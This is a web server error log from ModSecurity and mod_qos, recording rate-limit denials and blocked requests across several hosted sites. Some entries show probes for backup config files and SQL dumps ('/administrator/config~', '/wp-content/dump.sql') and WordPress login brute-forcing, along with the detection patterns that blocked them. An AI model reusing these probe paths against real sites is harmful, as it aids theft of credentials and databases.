[Tue May 26 19:54:25.434902 2026] [security2:error] [pid 93868:tid 94368] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGEqK9k_ZUB2Vp25ITQAAAf0"]
[Tue May 26 19:54:25.441119 2026] [security2:error] [pid 86490:tid 86646] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGFZMwN0DpLVWo6K83wAAAJ8"]
[Tue May 26 19:54:25.441155 2026] [security2:error] [pid 86490:tid 86666] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGFZMwN0DpLVWo6K8zQAAALM"]
[Tue May 26 19:54:25.447699 2026] [security2:error] [pid 93868:tid 94371] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGEqK9k_ZUB2Vp25ISgAAAgA"]
[Tue May 26 19:54:25.447850 2026] [security2:error] [pid 93576:tid 93741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGGDRMqfxdEDkoszQBgAAAB0"]
[Tue May 26 19:54:25.686309 2026] [security2:error] [pid 93576:tid 93614] [remote 50.62.182.250:35484] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 250.182.62.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWtGWDRMqfxdEDkoszQHAAACCM"]
[Tue May 26 19:54:25.701291 2026] [security2:error] [pid 86490:tid 86688] [client 185.177.72.53:35070] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/administrator/config~"] [unique_id "ahWtGVZMwN0DpLVWo6K9FAAAAMk"]
[Tue May 26 19:54:25.761286 2026] [qos:error] [pid 93576:tid 93788] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtGWDRMqfxdEDkoszQPQAAAEw
[Tue May 26 19:54:25.762042 2026] [qos:error] [pid 93868:tid 94380] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtGUqK9k_ZUB2Vp25IjAAAAgk
[Tue May 26 19:54:25.763588 2026] [qos:error] [pid 93576:tid 93802] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtGWDRMqfxdEDkoszQPwAAAFo
[Tue May 26 19:54:25.763695 2026] [qos:error] [pid 86490:tid 86746] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGVZMwN0DpLVWo6K9QgAAAQM
[Tue May 26 19:54:25.763772 2026] [qos:error] [pid 93868:tid 94365] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtGUqK9k_ZUB2Vp25IjQAAAfo
[Tue May 26 19:54:25.770289 2026] [qos:error] [pid 86490:tid 86640] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGVZMwN0DpLVWo6K9RgAAAJk
[Tue May 26 19:54:25.773428 2026] [qos:error] [pid 86490:tid 86745] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGVZMwN0DpLVWo6K9RwAAAQI
[Tue May 26 19:54:25.773774 2026] [qos:error] [pid 93868:tid 94273] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtGUqK9k_ZUB2Vp25IkAAAAZ4
[Tue May 26 19:54:25.775770 2026] [qos:error] [pid 93576:tid 93716] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGWDRMqfxdEDkoszQQwAAAAQ
[Tue May 26 19:54:25.775812 2026] [qos:error] [pid 86490:tid 86745] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWtGVZMwN0DpLVWo6K9SAAAAQI
[Tue May 26 19:54:25.913202 2026] [qos:error] [pid 86490:tid 86684] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGVZMwN0DpLVWo6K9VAAAAMU
[Tue May 26 19:54:25.915285 2026] [qos:error] [pid 86490:tid 86709] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGVZMwN0DpLVWo6K9VQAAAN4
[Tue May 26 19:54:25.915943 2026] [qos:error] [pid 86490:tid 86623] [client 45.148.10.120:34904] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGVZMwN0DpLVWo6K9VwAAAIg
[Tue May 26 19:54:25.916053 2026] [qos:error] [pid 86490:tid 86711] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGVZMwN0DpLVWo6K9WAAAAOA
[Tue May 26 19:54:25.916471 2026] [qos:error] [pid 93576:tid 93783] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGWDRMqfxdEDkoszQSgAAAEc
[Tue May 26 19:54:25.923467 2026] [qos:error] [pid 86490:tid 86722] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGVZMwN0DpLVWo6K9WwAAAOs
[Tue May 26 19:54:25.924399 2026] [qos:error] [pid 86490:tid 86719] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGVZMwN0DpLVWo6K9XAAAAOg
[Tue May 26 19:54:25.926451 2026] [qos:error] [pid 86490:tid 86706] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGVZMwN0DpLVWo6K9XQAAANs
[Tue May 26 19:54:25.927258 2026] [qos:error] [pid 93576:tid 93824] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGWDRMqfxdEDkoszQSwAAAHA
[Tue May 26 19:54:25.927769 2026] [qos:error] [pid 86490:tid 86742] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGVZMwN0DpLVWo6K9XgAAAP8
[Tue May 26 19:54:25.989148 2026] [security2:error] [pid 93576:tid 93598] [remote 50.62.182.250:35484] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 250.182.62.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWtGWDRMqfxdEDkoszQTQAAJhM"], referer: https://filosha.com/wp-login.php
[Tue May 26 19:54:26.025822 2026] [security2:error] [pid 86490:tid 86639] [client 185.177.72.53:35070] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/wp-content/dump.sql"] [unique_id "ahWtGlZMwN0DpLVWo6K9YAAAAJg"]
[Tue May 26 19:54:26.062994 2026] [qos:error] [pid 86490:tid 86681] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9YgAAAMI
[Tue May 26 19:54:26.065053 2026] [qos:error] [pid 86490:tid 86687] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9YwAAAMg
[Tue May 26 19:54:26.067233 2026] [qos:error] [pid 86490:tid 86633] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9ZAAAAJI
[Tue May 26 19:54:26.069977 2026] [qos:error] [pid 93576:tid 93785] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGmDRMqfxdEDkoszQUAAAAEk
[Tue May 26 19:54:26.071563 2026] [qos:error] [pid 86490:tid 86646] [client 45.148.10.120:34904] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9ZQAAAJ8
[Tue May 26 19:54:26.072280 2026] [qos:error] [pid 86490:tid 86666] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9ZgAAALM
[Tue May 26 19:54:26.073945 2026] [qos:error] [pid 86490:tid 86620] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9ZwAAAIU
[Tue May 26 19:54:26.078098 2026] [qos:error] [pid 86490:tid 86721] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9aAAAAOo
[Tue May 26 19:54:26.078605 2026] [qos:error] [pid 93576:tid 93715] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGmDRMqfxdEDkoszQUQAAAAM
[Tue May 26 19:54:26.084186 2026] [qos:error] [pid 86490:tid 86671] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9aQAAALg
[Tue May 26 19:54:26.212501 2026] [qos:error] [pid 86490:tid 86692] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9bAAAAM0
[Tue May 26 19:54:26.218739 2026] [qos:error] [pid 86490:tid 86746] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9bQAAAQM
[Tue May 26 19:54:26.221356 2026] [qos:error] [pid 86490:tid 86682] [client 45.148.10.120:34906] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9bgAAAMM
[Tue May 26 19:54:26.223273 2026] [qos:error] [pid 86490:tid 86717] [client 45.148.10.120:34904] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9bwAAAOY
[Tue May 26 19:54:26.224824 2026] [qos:error] [pid 86490:tid 86643] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9cAAAAJw
[Tue May 26 19:54:26.226790 2026] [qos:error] [pid 93576:tid 93780] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGmDRMqfxdEDkoszQUgAAAEQ
[Tue May 26 19:54:26.229207 2026] [qos:error] [pid 86490:tid 86640] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9cQAAAJk
[Tue May 26 19:54:26.231975 2026] [qos:error] [pid 93576:tid 93799] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGmDRMqfxdEDkoszQUwAAAFc
[Tue May 26 19:54:26.233384 2026] [qos:error] [pid 86490:tid 86658] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9cgAAAKs
[Tue May 26 19:54:26.237638 2026] [qos:error] [pid 86490:tid 86714] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9cwAAAOM
[Tue May 26 19:54:26.282043 2026] [security2:error] [pid 86490:tid 86715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGFZMwN0DpLVWo6K84AAAAOQ"]
[Tue May 26 19:54:26.284294 2026] [security2:error] [pid 86490:tid 86661] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGFZMwN0DpLVWo6K81wAAAK4"]
[Tue May 26 19:54:26.293522 2026] [security2:error] [pid 93576:tid 93838] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGGDRMqfxdEDkoszQDgAAAH4"]
[Tue May 26 19:54:26.295373 2026] [security2:error] [pid 93868:tid 94338] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGEqK9k_ZUB2Vp25ITgAAAd8"]
[Tue May 26 19:54:26.300629 2026] [security2:error] [pid 86490:tid 86636] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGFZMwN0DpLVWo6K85AAAAJU"]
[Tue May 26 19:54:26.303531 2026] [security2:error] [pid 93868:tid 94270] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGEqK9k_ZUB2Vp25IWAAAAZs"]
[Tue May 26 19:54:26.304892 2026] [security2:error] [pid 93576:tid 93738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGGDRMqfxdEDkoszQDwAAABo"]
[Tue May 26 19:54:26.326982 2026] [security2:error] [pid 93868:tid 94358] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGEqK9k_ZUB2Vp25IUAAAAfM"]
[Tue May 26 19:54:26.340132 2026] [security2:error] [pid 93576:tid 93757] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGGDRMqfxdEDkoszQDQAAAC0"]
[Tue May 26 19:54:26.342362 2026] [security2:error] [pid 86490:tid 86669] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGFZMwN0DpLVWo6K85QAAALY"]
[Tue May 26 19:54:26.350071 2026] [security2:error] [pid 93868:tid 94302] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGEqK9k_ZUB2Vp25ITwAAAbs"]
[Tue May 26 19:54:26.350642 2026] [security2:error] [pid 86490:tid 86716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGFZMwN0DpLVWo6K84wAAAOU"]
[Tue May 26 19:54:26.352103 2026] [security2:error] [pid 93576:tid 93794] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGGDRMqfxdEDkoszQEAAAAFI"]
[Tue May 26 19:54:26.352877 2026] [security2:error] [pid 93868:tid 94307] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGEqK9k_ZUB2Vp25IUwAAAcA"]
[Tue May 26 19:54:26.355283 2026] [security2:error] [pid 93576:tid 93719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGGDRMqfxdEDkoszQEwAAAAc"]
[Tue May 26 19:54:26.379392 2026] [security2:error] [pid 93576:tid 93775] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGWDRMqfxdEDkoszQIwAAAD8"]
[Tue May 26 19:54:26.380523 2026] [security2:error] [pid 93576:tid 93776] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGWDRMqfxdEDkoszQHwAAAEA"]
[Tue May 26 19:54:26.388668 2026] [security2:error] [pid 93868:tid 94355] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGUqK9k_ZUB2Vp25IaAAAAfA"]
[Tue May 26 19:54:26.391684 2026] [security2:error] [pid 93576:tid 93823] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGWDRMqfxdEDkoszQJgAAAG8"]
[Tue May 26 19:54:26.409912 2026] [security2:error] [pid 93868:tid 94271] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGUqK9k_ZUB2Vp25IawAAAZw"]
[Tue May 26 19:54:26.418434 2026] [security2:error] [pid 93576:tid 93820] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGWDRMqfxdEDkoszQIgAAAGw"]
[Tue May 26 19:54:26.423048 2026] [security2:error] [pid 93576:tid 93754] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGWDRMqfxdEDkoszQKQAAACo"]
[Tue May 26 19:54:26.426449 2026] [security2:error] [pid 93576:tid 93784] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGWDRMqfxdEDkoszQKgAAAEg"]
[Tue May 26 19:54:26.427994 2026] [security2:error] [pid 93868:tid 94384] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGUqK9k_ZUB2Vp25IcQAAAg0"]
[Tue May 26 19:54:26.428882 2026] [security2:error] [pid 93576:tid 93813] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGWDRMqfxdEDkoszQJAAAAGU"]
[Tue May 26 19:54:26.431880 2026] [security2:error] [pid 93868:tid 94276] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGUqK9k_ZUB2Vp25IcwAAAaE"]
[Tue May 26 19:54:26.445771 2026] [security2:error] [pid 93868:tid 94344] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGUqK9k_ZUB2Vp25IcgAAAeU"]
[Tue May 26 19:54:26.458973 2026] [security2:error] [pid 93868:tid 94348] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGUqK9k_ZUB2Vp25IbAAAAek"]
[Tue May 26 19:54:26.464911 2026] [security2:error] [pid 93868:tid 94320] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtGUqK9k_ZUB2Vp25IeAAAAc0"]
[Tue May 26 19:54:26.573413 2026] [qos:error] [pid 86490:tid 86693] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9sAAAAM4
[Tue May 26 19:54:26.573479 2026] [qos:error] [pid 86490:tid 86669] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9rwAAALY
[Tue May 26 19:54:26.576490 2026] [qos:error] [pid 93576:tid 93772] [client 45.148.10.120:35246] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGmDRMqfxdEDkoszQZgAAADw
[Tue May 26 19:54:26.582968 2026] [qos:error] [pid 86490:tid 86670] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9sQAAALc
[Tue May 26 19:54:26.584359 2026] [qos:error] [pid 86490:tid 86635] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9sgAAAJQ
[Tue May 26 19:54:26.586978 2026] [qos:error] [pid 86490:tid 86657] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9swAAAKo
[Tue May 26 19:54:26.587857 2026] [qos:error] [pid 86490:tid 86709] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9tAAAAN4
[Tue May 26 19:54:26.603593 2026] [qos:error] [pid 86490:tid 86623] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9tQAAAIg
[Tue May 26 19:54:26.610253 2026] [qos:error] [pid 86490:tid 86701] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9tgAAANY
[Tue May 26 19:54:26.617474 2026] [qos:error] [pid 86490:tid 86684] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9twAAAMU
[Tue May 26 19:54:26.721708 2026] [qos:error] [pid 86490:tid 86711] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtGlZMwN0DpLVWo6K9ugAAAOA
